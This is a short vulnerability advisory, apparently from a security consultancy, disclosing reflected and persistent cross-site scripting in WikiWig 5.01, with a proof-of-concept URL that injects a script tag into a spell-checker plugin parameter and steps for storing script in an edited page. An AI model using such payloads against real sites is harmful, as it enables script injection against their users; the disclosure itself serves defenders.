Home
Consulting
Advisories
Software
Articles
Contact

WikiWig 5.01 Persistent/Reflected Cross-site Scripting

Legacy Advisories

Description

A persistent/reflected cross-site scripting vulnerability in WikiWig 5.01 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

Reflected:
http://localhost/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E

Persistent:
Create a user account. Edit any page and add script tags.

<script>alert(0)</script>


Copyright © 2018 AutoSec Tools LLC